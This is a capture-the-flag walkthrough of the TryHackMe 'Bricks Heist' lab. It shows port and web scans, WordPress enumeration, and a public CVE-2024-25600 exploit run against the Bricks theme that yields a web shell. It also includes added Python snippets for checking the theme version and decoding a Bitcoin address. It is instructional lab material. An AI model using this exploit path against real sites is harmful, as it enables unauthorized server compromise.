(THM//EASY) TryHack3M: Bricks Heist
Difficulty: Easy
Recon
TCP scan
$ nmap -sV -sC bricks.thm
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-28 21:16 CET
Nmap scan report for bricks.thm (10.10.71.8)
Host is up (0.031s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 82:30:a4:dd:26:2c:9b:ba:8a:50:2c:07:00:2b:cd:3e (RSA)
| 256 b4:2b:83:b3:b3:17:e2:ed:53:8f:dc:62:1b:e4:30:01 (ECDSA)
|_ 256 ad:81:32:a5:3c:05:7a:05:5a:c6:75:fb:fc:3e:40:ac (ED25519)
80/tcp open http Python http.server 3.5 - 3.10
|_http-title: Error response
|_http-server-header: WebSockify Python/3.8.10
443/tcp open ssl/http Apache httpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-04-02T11:59:14
|_Not valid after: 2025-04-02T11:59:14
|_http-title: 400 Bad Request
| tls-alpn:
| h2
|_ http/1.1
|_http-server-header: Apache
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
3306/tcp open mysql MySQL (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.24 seconds
Findings:
- 22/tcp: OpenSSH
- 80/tcp: Python HTTP server (WebSockify, Python/3.8.10)
- 443/tcp: HTTPS via Apache, serving WordPress
- 3306/tcp: MySQL database
UDP scan
$ udpx -t bricks.thm
v1.0.7, by @nullt3r
2025/10/28 21:35:20 [+] Starting UDP scan on 1 target(s)
2025/10/28 21:35:40 [+] Scan completed
Nothing found on UDP.
Web enumeration
$ gobuster dir -u https://bricks.thm -w ../../SecLists/Discovery/Web-Content/common.txt -k -x txt
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://bricks.thm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: ../../SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
.hta (Status: 403) [Size: 199]
.hta.txt (Status: 403) [Size: 199]
.htaccess (Status: 403) [Size: 199]
.htaccess.txt (Status: 403) [Size: 199]
.htpasswd (Status: 403) [Size: 199]
.htpasswd.txt (Status: 403) [Size: 199]
0 (Status: 301) [Size: 0] [--> https://bricks.thm/0/]
B (Status: 301) [Size: 0] [--> https://bricks.thm/2024/04/02/brick-by-brick/]
S (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
admin (Status: 302) [Size: 0] [--> https://bricks.thm/wp-admin/]
atom (Status: 301) [Size: 0] [--> https://bricks.thm/feed/atom/]
b (Status: 301) [Size: 0] [--> https://bricks.thm/2024/04/02/brick-by-brick/]
br (Status: 301) [Size: 0] [--> https://bricks.thm/2024/04/02/brick-by-brick/]
dashboard (Status: 302) [Size: 0] [--> https://bricks.thm/wp-admin/]
embed (Status: 301) [Size: 0] [--> https://bricks.thm/embed/]
favicon.ico (Status: 302) [Size: 0] [--> https://bricks.thm/wp-includes/images/w-logo-blue-white-bg.png]
feed (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
index.php (Status: 301) [Size: 0] [--> https://bricks.thm/]
license.txt (Status: 200) [Size: 19915]
login (Status: 302) [Size: 0] [--> https://bricks.thm/wp-login.php]
page1 (Status: 301) [Size: 0] [--> https://bricks.thm/]
phpmyadmin (Status: 301) [Size: 238] [--> https://bricks.thm/phpmyadmin/]
rdf (Status: 301) [Size: 0] [--> https://bricks.thm/feed/rdf/]
render/https://www.google.com (Status: 301) [Size: 0] [--> https://bricks.thm/render/https:/www.google.com]
render?url=https://www.google.com (Status: 301) [Size: 0] [--> https://bricks.thm/render%3Furl=https:/www.google.com]
render?url=https://www.google.com.txt (Status: 301) [Size: 0] [--> https://bricks.thm/render%3Furl=https:/www.google.com.txt]
render/https://www.google.com.txt (Status: 301) [Size: 0] [--> https://bricks.thm/render/https:/www.google.com.txt]
robots.txt (Status: 200) [Size: 67]
robots.txt (Status: 200) [Size: 67]
rss (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
rss2 (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
sa (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
s (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
sam (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
sample (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
server-info (Status: 403) [Size: 199]
server-status (Status: 403) [Size: 199]
wp-admin (Status: 301) [Size: 236] [--> https://bricks.thm/wp-admin/]
wp-content (Status: 301) [Size: 238] [--> https://bricks.thm/wp-content/]
wp-includes (Status: 301) [Size: 239] [--> https://bricks.thm/wp-includes/]
xmlrpc.php (Status: 405) [Size: 42]
Progress: 9500 / 9500 (100.00%)
===============================================================
Finished
===============================================================
Findings:
- /phpmyadmin/
WordPress enumeration
$ /home/user/.local/share/gem/ruby/3.3.0/bin/wpscan --url https://bricks.thm --disable-tls-checks
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.8.28
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: https://bricks.thm/ [10.10.71.8]
[+] Started: Tue Oct 28 21:47:32 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: server: Apache
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: https://bricks.thm/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: https://bricks.thm/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: https://bricks.thm/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: https://bricks.thm/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.5 identified (Insecure, released on 2024-04-02).
| Found By: Rss Generator (Passive Detection)
| - https://bricks.thm/feed/, <generator>https://wordpress.org/?v=6.5</generator>
| - https://bricks.thm/comments/feed/, <generator>https://wordpress.org/?v=6.5</generator>
[+] WordPress theme in use: bricks
| Location: https://bricks.thm/wp-content/themes/bricks/
| Readme: https://bricks.thm/wp-content/themes/bricks/readme.txt
| Style URL: https://bricks.thm/wp-content/themes/bricks/style.css
| Style Name: Bricks
| Style URI: https://bricksbuilder.io/
| Description: Visual website builder for WordPress....
| Author: Bricks
| Author URI: https://bricksbuilder.io/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 1.9.5 (80% confidence)
| Found By: Style (Passive Detection)
| - https://bricks.thm/wp-content/themes/bricks/style.css, Match: 'Version: 1.9.5'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:03 <=========================> (137 / 137) 100.00% Time: 00:00:03
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Oct 28 21:47:40 2025
[+] Requests Done: 186
[+] Cached Requests: 7
[+] Data Sent: 44.233 KB
[+] Data Received: 22.571 MB
[+] Memory used: 271.578 MB
[+] Elapsed time: 00:00:07
Findings:
- WordPress version 6.5
- WordPress theme Bricks, version 1.9.5
Conclusions
Analysing these findings, I identified that the Bricks theme in the version found here (1.9.5) is vulnerable to CVE-2024-25600, which allows unauthenticated code injection. Public exploits exist.
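A defender-side check for the same finding, added here as an example and not part of the original write-up: parse the theme version out of a style.css header (as wpscan did above) and compare it numerically against the release that fixed CVE-2024-25600. The fixed version 1.9.6.1 comes from the public advisory for the CVE, not from this page; the style.css text is a constructed sample.

```python
import re
from typing import Optional

# Version in which Bricks Builder shipped the fix for CVE-2024-25600
# (taken from the public advisory for the CVE, not from this write-up).
BRICKS_FIXED_VERSION = "1.9.6.1"

# Constructed sample of the header block WordPress reads from a theme's style.css;
# the Version line mirrors what wpscan matched on the target.
SAMPLE_STYLE_CSS = """/*
Theme Name: Bricks
Theme URI: https://bricksbuilder.io/
Description: Visual website builder for WordPress.
Author: Bricks
Version: 1.9.5
*/
"""


def parse_theme_version(style_css: str) -> Optional[str]:
    """Pull the 'Version:' header out of a theme's style.css text."""
    m = re.search(r"^\s*Version:\s*([0-9]+(?:\.[0-9]+)*)", style_css, re.MULTILINE)
    return m.group(1) if m else None


def version_tuple(version: str, width: int) -> tuple:
    """Split '1.9.5' into (1, 9, 5, 0), zero-padded to width so 1.9.6 == 1.9.6.0."""
    parts = tuple(int(p) for p in version.split("."))
    return parts + (0,) * (width - len(parts))


def is_vulnerable_to_cve_2024_25600(theme_version: str) -> bool:
    """True when the installed theme is older than the fixed release.

    The numeric compare matters: as strings, '1.9.10' < '1.9.6.1', which
    would wrongly flag a patched 1.9.10 install as vulnerable.
    """
    width = max(theme_version.count("."), BRICKS_FIXED_VERSION.count(".")) + 1
    return version_tuple(theme_version, width) < version_tuple(BRICKS_FIXED_VERSION, width)


if __name__ == "__main__":
    found = parse_theme_version(SAMPLE_STYLE_CSS)
    print("Bricks", found, "vulnerable:", is_vulnerable_to_cve_2024_25600(found))
```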
Initial foothold
I used this public exploit.
$ python3 CVE-2024-25600.py -u https://bricks.thm
Coded By: K3ysTr0K3R --> Hello, Friend!
[*] Checking if the target is vulnerable
[+] The target is vulnerable
[*] Initiating exploit against: https://bricks.thm
[*] Initiating interactive shell
[+] Interactive shell opened successfully
Shell> id
uid=1001(apache) gid=1001(apache) groups=1001(apache)
Shell> pwd
/data/www/default
Shell> ls
REDACTED.txt
index.php
kod
license.txt
phpmyadmin
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
Shell> cat REDACTED.txt
THM{REDACTED}
Finding the suspicious process
Shell> systemctl | grep running
...
REDACTED.service loaded active running TRYHACK3M
Shell> systemctl status REDACTED.service
● REDACTED.service - TRYHACK3M
Loaded: loaded (/etc/systemd/system/REDACTED.service; enabled; vendor preset: enabled)
Active: active (running) since Tue 2025-10-28 20:54:26 UTC; 3min 43s ago
Main PID: 2759 (REDACTED)
Tasks: 2 (limit: 4671)
Memory: 29.0M
CGroup: /system.slice/ubuntu.service
├─2759 /lib/NetworkManager/REDACTED
└─2760 /lib/NetworkManager/REDACTED
The rest
The rest of the challenge consists of reading /lib/NetworkManager/inet.conf, decoding the ID it contains (From Hex > From Base64 > From Base64) to recover the BTC address, and searching the web for that address.
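The decode chain above, plus a Base58Check sanity test on its output so that a wrong decoding order produces a clear failure instead of a garbage "address"; this is an added example and not part of the original write-up. The ID is constructed here (the real one lives in inet.conf on the box and is not on this page), and the well-known Bitcoin genesis-block address is used only as a known-valid sample value.

```python
import base64
import binascii
import hashlib

# Base58 alphabet used by Bitcoin addresses (no 0, O, I or l).
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def decode_id(hex_id: str) -> str:
    """Unwrap the ID the way the write-up describes: hex -> base64 -> base64."""
    stage1 = binascii.unhexlify(hex_id.strip())          # From Hex
    stage2 = base64.b64decode(stage1, validate=True)     # From Base64
    stage3 = base64.b64decode(stage2, validate=True)     # From Base64 again
    return stage3.decode("ascii")


def base58check_valid(addr: str) -> bool:
    """True if addr decodes to 25 bytes whose last 4 match sha256(sha256(first 21))."""
    n = 0
    for ch in addr:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            return False                                  # not a Base58 character
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    # Each leading '1' encodes a leading zero byte that the integer form drops.
    pad = len(addr) - len(addr.lstrip("1"))
    raw = b"\x00" * pad + body
    if len(raw) != 25:
        return False
    payload, checksum = raw[:21], raw[21:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def encode_id(plain: str) -> str:
    """Inverse of decode_id; used only to build the constructed sample below."""
    return binascii.hexlify(base64.b64encode(base64.b64encode(plain.encode()))).decode()


# Constructed sample: the Bitcoin genesis-block address wrapped exactly like the challenge ID.
SAMPLE_ID = encode_id("1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa")

if __name__ == "__main__":
    addr = decode_id(SAMPLE_ID)
    print(addr, "valid Base58Check:", base58check_valid(addr))
```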